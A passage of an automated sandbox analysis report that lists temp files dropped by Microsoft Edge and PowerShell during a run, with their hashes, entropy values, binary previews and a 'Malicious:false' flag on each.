                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                                                                                              MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                                                                                              SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                                                                                              SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\8e4ba272-1e8b-4190-ad80-ff50ac1aa73c.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 177576
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20333
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.97381042223252
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:rGEboynmISMSnkaDZ80M+Qf+Wjp7znupZpEOLdjGVVlvLdP8R0Ih9gqEX9:rGJw1J+Qp9/nqFLId0ZGqC9
                                                                                                                                                                                                                                                                                                                                                              MD5:6EEB3D40F701E6A6230210537005565E
                                                                                                                                                                                                                                                                                                                                                              SHA1:EC75E8DCE3B39DFA804888D934D0EB6A11921944
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F03904426EBFDF68D73EFBD46F4B729F640E097C17DCB4D5E140D26DF346C32D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:089237776307B5879FB7A4F1EDAD305B1211C97D482E07EB5D25D4F9B290DE5EEA23B6348C61073240582E54A50313A4D81F17B3905BE74C6CC03B42ADBE0622
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...........}yS\G.oE./.z|'`h0.&.c.,!.;.(@........vo..2...1._....S.Y.h#..B..sj.....ef....X..b"?;b(..8.Wb*..).v.@~[.....F...4..;..\..#L.o......|2..Ld.......o...5.cY&.r)k.T.X..^.]..L..7;....Ze..Njj...oQ...[....}.vz..x&...Z.2EO.oc.P7.."4.b.....$O..?..h._......e)...-..\..?h.Q...[_...wuYBW~.S...m....:.T.F)<P..f.-......[0.o..ne....+.,...2. .l.;....h..[U..m..W$..d.S.E..^-\sEr...6vJsk.J......75I..R...$#.-..w.jK...I.,]..".q......`.B5.,.^.)...u..-...2...n.q.I.bT.!.)M..(z..9.m5........8.....|.M..........G.F.K.)..d....2..%-!..\....9%u.......u....f...DfzMp<.8....I.A.,.K..h..3..4...Z.3..>...g.+......vT..}.c.dCr..Y.c....Db....h......Q(..D.9|)Yi..V.2..2...1...(PF=RF.@.W.2....2l..G)M.....T.V4HF..y.....iw=....d.X.%O.t..,...P.]Y.....m..Yz..9..i.L1.....~.g...8....a5...d.;...|Z.....X.5.$..'0.AG.4o.7.._4..q-.`-$.h...PF;..2..2.'.W..j....l>...j.\G.]....N..c.B.......I.{..VP...S.P..}Tk~.5.U\.`..Hi....@..YFG.`A.&..s^.w.$.bo..k.gc.s.u.A.C..l..zw..........j..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\9dba0b48-1abb-43a9-9ad7-b947371c8fc4.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 55029
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32272
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.990599751524113
                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:BujLs/FHAVTTG2UUa3GWphjNQmB0PIEHnHMVX8UfQXyZ:B4Ls/sW2Uf3jNQmBfinsVXNIXk
                                                                                                                                                                                                                                                                                                                                                              MD5:B2922AF996D924E651541153385B2011
                                                                                                                                                                                                                                                                                                                                                              SHA1:37F062EF07E36BEE5FC076E26CD0C55328B2A142
                                                                                                                                                                                                                                                                                                                                                              SHA-256:ED84BAA1E2DEE3BD8C85753EFE099E162C0521249D4583AFA862FA90E1368A02
                                                                                                                                                                                                                                                                                                                                                              SHA-512:452E4D1122AD42E9CF96597CC4B7C7EDDBA8A5476CC14228B7F48A11315FC647E6E2EA1341CC78C29992390233AD1709A2B63BF8FC6EB3308EE61BC3E7881535
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...........<k{.8...+..n.&.M..9.c.B..Ba...}$.qC.8..R...33.l..v.,.6...h4w..c..`5Nf.s{.....o.J..W7.(.5^..Q.r.h4.E..d.-V.h....e.r&X....X..w.HV...jA.z...@.....u.l.[..<......,L.[-......e.....D.I.5[O&M_.../1.}...R.M...H&.......pA.#b...o...Y#k.......d:?_...V....e9m.n...i.....zVw...|.,<....g5...,.....PR....Z;..z..m..F.x..b....v....3mS.Z->.6".IS.+.*MYh`.K...m......D.xu....L.US.......;0a...S@$.og..U....T.6..s".....l.3...._E.B.W]e..D.f..f.uC.l..G......T..z....z/.,#.z..do@..GD.1<..jqs;...9.s~._po.C...X.%.=...W...f7................gu.H.iq...'.E..y.j...Y.j..D.....rr..._S..+.g..8.s;..$n',....z*.....h<....,........v...;... .zQc.4.,%.....x...4......Bu0.b.v.4..C-T8.3n...'..HSo.. u.....^...53J..f.../O..tk..aVX....`.E...\.7..l..L.\-.8.4 .U.`..quo.u+!*.p...._@.r.gA&v.5#...HRv4...*..]%g......."......R.C.$.)........Xa8G...V.N.pw9...h[.\......8"jh.....%..a].M.....vZDF..../L8V.Q&.R.*..,...FI`...~.....N...&.......P...L.m.RvUG...4~.?..".4.b}..\7Hos i.i..|>..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0w3q4au.euh.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adapavdd.p51.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azyqymle.rml.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsjqe0hn.ubz.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv14rhqs.aly.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h55z44ek.clg.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfdamlmi.y1d.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgbf0ize.mgb.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qowcghx4.xu2.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3qlspxf.11m.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbzp15nc.k1l.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skh0feyu.34t.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh0iycys.pgn.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5ehd3q2.ney.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wca4w4rt.xoe.psm1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
